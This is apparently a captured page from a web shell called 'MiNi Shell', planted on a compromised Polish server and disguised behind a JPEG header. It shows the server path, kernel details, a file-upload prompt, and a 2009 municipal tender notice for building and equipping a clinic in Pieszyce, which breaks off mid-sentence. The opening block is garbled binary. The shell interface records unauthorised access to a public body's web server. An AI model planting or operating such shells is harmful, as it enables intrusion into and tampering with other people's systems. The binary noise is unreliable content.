JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090813/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090813/278312-N-2009.html

<p class="kh_header"><b>Pieszyce: Wykonanie robót budowlanych i dostawę sprzętu medycznego w ramach  projektu pn. Budowa nowej siedziby SP ZOZ Przychodni Miejskiej w Pieszycach (etap I, II, III) i jej doposażenie ratunkiem dla lokalnej społeczności</b><br>
<b>Numer ogłoszenia: 278312 - 2009; data zamieszczenia: 13.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Pieszyce , ul. Kościuszki 2, 58-250 Pieszyce, woj. dolnośląskie, tel. 074 8365487, 8365488, faks 074 8367230.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.pieszyce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych i dostawę sprzętu medycznego w ramach  projektu pn. Budowa nowej siedziby SP ZOZ Przychodni Miejskiej w Pieszycach (etap I, II, III) i jej doposażenie ratunkiem dla lokalnej społeczności.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> . Przedmiotem niniejszego zamówienia jest  budowa nowej siedziby SP ZOZ Przychodni Miejskiej w Pieszycach od stanu surowego z zadaszeniem  I etapu do stanu pod klucz etapów I, II i III (z wyłączeniem etapu IV ujętego w projekcie technicznym t.j. Apteki - wyłączonej z realizacji) łącznie z dostawą i montażem sprzętu jak w pkt.4.1.1 w ramach zadania inwestycyjnego p.n. : Budowa nowej siedziby SP ZOZ Przychodni Miejskiej w Pieszycach  (etap I, II, III) i jej doposażenie ratunkiem dla lokalnej społeczności

Realizacja zgodnie z projektem jest podzielona na IV etapy . Przedmiotem niniejszego zamówienia jest  zakres obejmujący trzy  etapy oznaczone na projekcie zagospodarowania t.j. : 
   I Etap    - 1337,46 m2 pow. użytkowej
  II Etap    -  113,15 m2  pow. użytkowej
 III Etap    -   161,89 m2 pow. użytkowej 
                      łącznie :      1612,50 m2 

Budowa została rozpoczęta w 2006r.i został zrealizowany  Etap I w stanie surowym z zadaszeniem. 

4.1.1 Dostawa i montaż sprzętu dla realizowanej Przychodni

Nazwa sprzętu 	Ilość
Aparat rentgenodiagnostyczny 	1 SZT
Zestaw Holtera do oceny zaburzeń rytmu serca	1 SZT
Aparat do badania EEG	1 SZT
Aparat do badania EMG	1 SZT
Bieżnia do prób wysiłkowych	1 SZT
Defibrylator 	1 SZT
Kabina do badań audiometrycznych	1 SZT
Fotel ginekologiczny i koloskop	1 SZT
Fotel laryngologiczno-okulistyczny	1 SZT
Unit stomatologiczny 	1 SZT
Aparatura do wideoendoskopii 	1 SZT
Stół chirurgiczny (wyższej klasy)	1 SZT
Stół chirurgiczny (niższej klasy)	1 SZT
Diametria chirurgiczna z przystawką argonową 	1 SZT
Lampa bezcieniowa	2 SZT

Dokładny zakres zamówienia określony został w Dokumentacji projektowej, Specyfikacjach technicznych wykonania i odbioru robót oraz w specyfikacjach technicznych sprzętu - część III do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 33.10.00.00-1, 45.11.00.00-1, 45.23.00.00-8, 45.26.00.00-7, 45.31.00.00-3, 45.33.00.00-9, 45.41.00.00-4, 45.42.00.00-7, 45.43.00.00-0, 45.44.00.00-3, 45.45.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 150.000,00zł (słownie: sto pięćdziesiąt tysięcy złotych 00/100).
Wykonawca może wnieść wadium jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
a) pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr z 2007 Nr 42, poz. 275).
2. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
3. Wadium w pieniądzu należy wnieść przelewem  na konto Zamawiającego:
Bank BZ WBK S.A. I o/Dzierżoniów   Nr 76 1090 2301 0000 0005 9000 0617
4. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
5.W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium dołączyć do oferty.
6. Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 4 ustawy, a jego oferta zostanie uznana za odrzuconą na podstawie art. 24 ust. 4 ustawy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia zgodnie z art. 22 ustawy pzp mogą ubiegać się wykonawcy, którzy spełniają poniższe warunki:

W tabeli poniżej przedstawiono warunki stawiane wykonawcom ubiegającym się o udzielenie niniejszego zamówienia a także wskazano dokumenty wymagane od wykonawców potwierdzające spełnianie tych warunków. Brak spełnienia któregokolwiek warunku wymienionego poniżej spowoduje wykluczenie wykonawcy z niniejszego postępowania.

Nazwa Części Tabeli	WARUNEK	DOKUMENTY LUB OŚWIADCZENIA POTWIERDZAJĄCE SPEŁNIANIE WARUNKU	DATA WYSTAWIENIA LUB SPORZĄDZENIA DOKUMENTU ALBO OŚWIADCZENIA
A.		Posiadania przez wykonawcę uprawnień do wykonywania działalności lub czynności objętych niniejszym zamówieniem oraz niepodleganie wykluczeniu z postępowania na podstawie art. 24 ust. 1 i ust. 2 ustawy z dnia 29 stycznia 2004 r. (Dz. U. Nr 19, poz. 177) Prawo zamówień publicznych 	1.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej - jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej -  potwierdzające uprawnienia do wykonywania działań lub czynności objętych niniejszym zamówieniem   	Nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
		2.	Aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 u.p.z.p., tj. potwierdzające odpowiednio, że w przypadku wykonawcy będącego:
a)	osobą fizyczną - tej osoby fizycznej;
b)	spółką jawną - wspólnika;
c)	spółką partnerską - partnera lub członka zarządu;
d)	spółką komandytową - komplementariusza;
e)	spółką komandytowo-akcyjną  - komplementariusza;
f)	osobą prawną (nie wymienioną powyżej) - urzędującego członka organu zarządzającego
nie skazano prawomocnie za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przekupstwa, przestępstwa przeciwko obrotowi gospodarczemu lub innego przestępstwa popełnionego w celu osiągnięcia korzyści majątkowych      		Nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
		3.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 u.p.z.p., tj. potwierdzająca, że wobec podmiotu zbiorowego sąd nie orzekł zakazu ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary		Nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
		4.	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu 		Nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.  
		5.	Oświadczenia sporządzone według wzoru stanowiącego załącznik nr 2, 3, 4 i 6 do SIWZ.		Przed upływem terminu składania ofert.
B.		Posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz potencjału technicznego, a także dysponowania osobami zdolnymi do wykonania zamówienia. 
	
Wykonawca musi posiadać doświadczenie w należytym wykonaniu robót budowlanych polegających na budowie, przebudowie lub remoncie obiektów budowlanych o wartości nie mniejszej (łącznie) niż 4.500.000,00 zł, w tym co najmniej jedna robota budowlana o wartości 2.000.000,00 zł
	1.	Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat (zgodnie z załącznikiem nr 5 do SIWZ) przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością (łącznie co najmniej 4.500.000,00 zł) robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że te roboty budowlane zostały wykonane należycie.   	Przed upływem terminu składania ofert.
		1.	Dokumenty potwierdzające, że zamówienia wskazane w  załączniku nr 5 do SIWZ zostały wykonane należycie. Przedkładane dokumenty muszą zawierać co najmniej:
a)	wskazanie, że wykonawca składający ofertę w niniejszym postępowaniu, realizował zamówienie, którego dokument dotyczy,
b)	wskazanie podmiotu, na rzecz którego realizowane było zamówienie,
c)	wskazanie zakresu realizowanego zamówienia,
d)	wskazanie wartości zamówienia,
e)	wskazanie daty wykonania,
f)	opinia podmiotu wskazanego powyżej w pkt. b) stwierdzająca, że zamówienie zostało wykonane należycie, 
g)	podpis upoważnionego przedstawiciela podmiotu wskazanego w pkt. b)		Przed upływem terminu składania ofert.
		2. Wykaz osób (sporządzony według wzorów stanowiących załącznik nr 7 do SIWZ), które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z danymi na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności. Przedłożone przez wykonawcę wykazy i dokumenty muszą potwierdzać, że: 
-Zatrudniony przez wykonawcę kierownik budowy posiada odpowiednie kwalifikacje zawodowe i posiada doświadczenie jako kierownik budowy w realizacji przynajmniej 1 inwestycji odpowiadającej swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia *.
- Zatrudnia osoby z odpowiednimi kwalifikacjami i doświadczeniem zawodowym, w tym co najmniej: jednego w specjalności budowlanej, jednego w instalacyjnej i jednego w elektrycznej (kierownicy robót branżowych)*.
* Należy załączyć kserokopie uprawnień w/w pracowników + aktualne zaświadczenia o przynależności do izby rzemieślniczej 
		Przed upływem terminu składania ofert.
	
C.		Znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
	Wykonawca musi spełniać następujący warunek:
Wykonawca musi posiadać środki finansowe lub zdolność kredytową w wysokości co najmniej 700.000,00 zł
Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia.		Przed upływem terminu składania ofert.
 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
1)	W przypadku wspólnego ubiegania się o udzielenie zamówienia, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
2)	Dokumenty określone w pkt 8 A1, A2, A3, A4 IDW, oraz oświadczenie na podstawie załącznika nr 4 do SIWZ dotyczą każdego wykonawcy.
3)	Pozostałe dokumenty określone w pkt 8 IDW  dotyczą wykonawców wspólnie.

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej:
1) zamiast dokumentów o których mowa w pkt. A1, A3 i A4 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert),
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert),
c)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).
2)	zamiast dokumentów o których mowa w pkt. A2 - składa zaświadczenie (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu ofert) właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy pzp.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa wyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania stosując odpowiednio zapisy o terminie ich wystawienia.

Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę.

Ocena spełniania powyższych warunków dokonywana będzie w oparciu o złożoną ofertę i załączniki do niej wg zasady spełnia - nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu udokumentowania spełniania warunków udziału w postępowaniu , wykonawcy wraz z oferta przedłożą oświadczenia i dokumenty wymienione w pkt.8 SIWZ oraz pkt. 34 SIWZ- Wykaz załączników do IDW..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.pieszyce.sisco.info.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Pieszyce
ul. Kościuszki 2
58-250 Pieszyce
pok. nr 13.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.09.2009 godzina 11:45, miejsce: Urząd Miasta Pieszyce
ul. Kościuszki 2
58-250 Pieszyce
pok. nr 14.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 02.10.2009.</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane ze środków Unii Europejskiej z Programu Operacyjnego: Regionalny Program

Creat By MiNi SheLL
Email: jattceo@gmail.com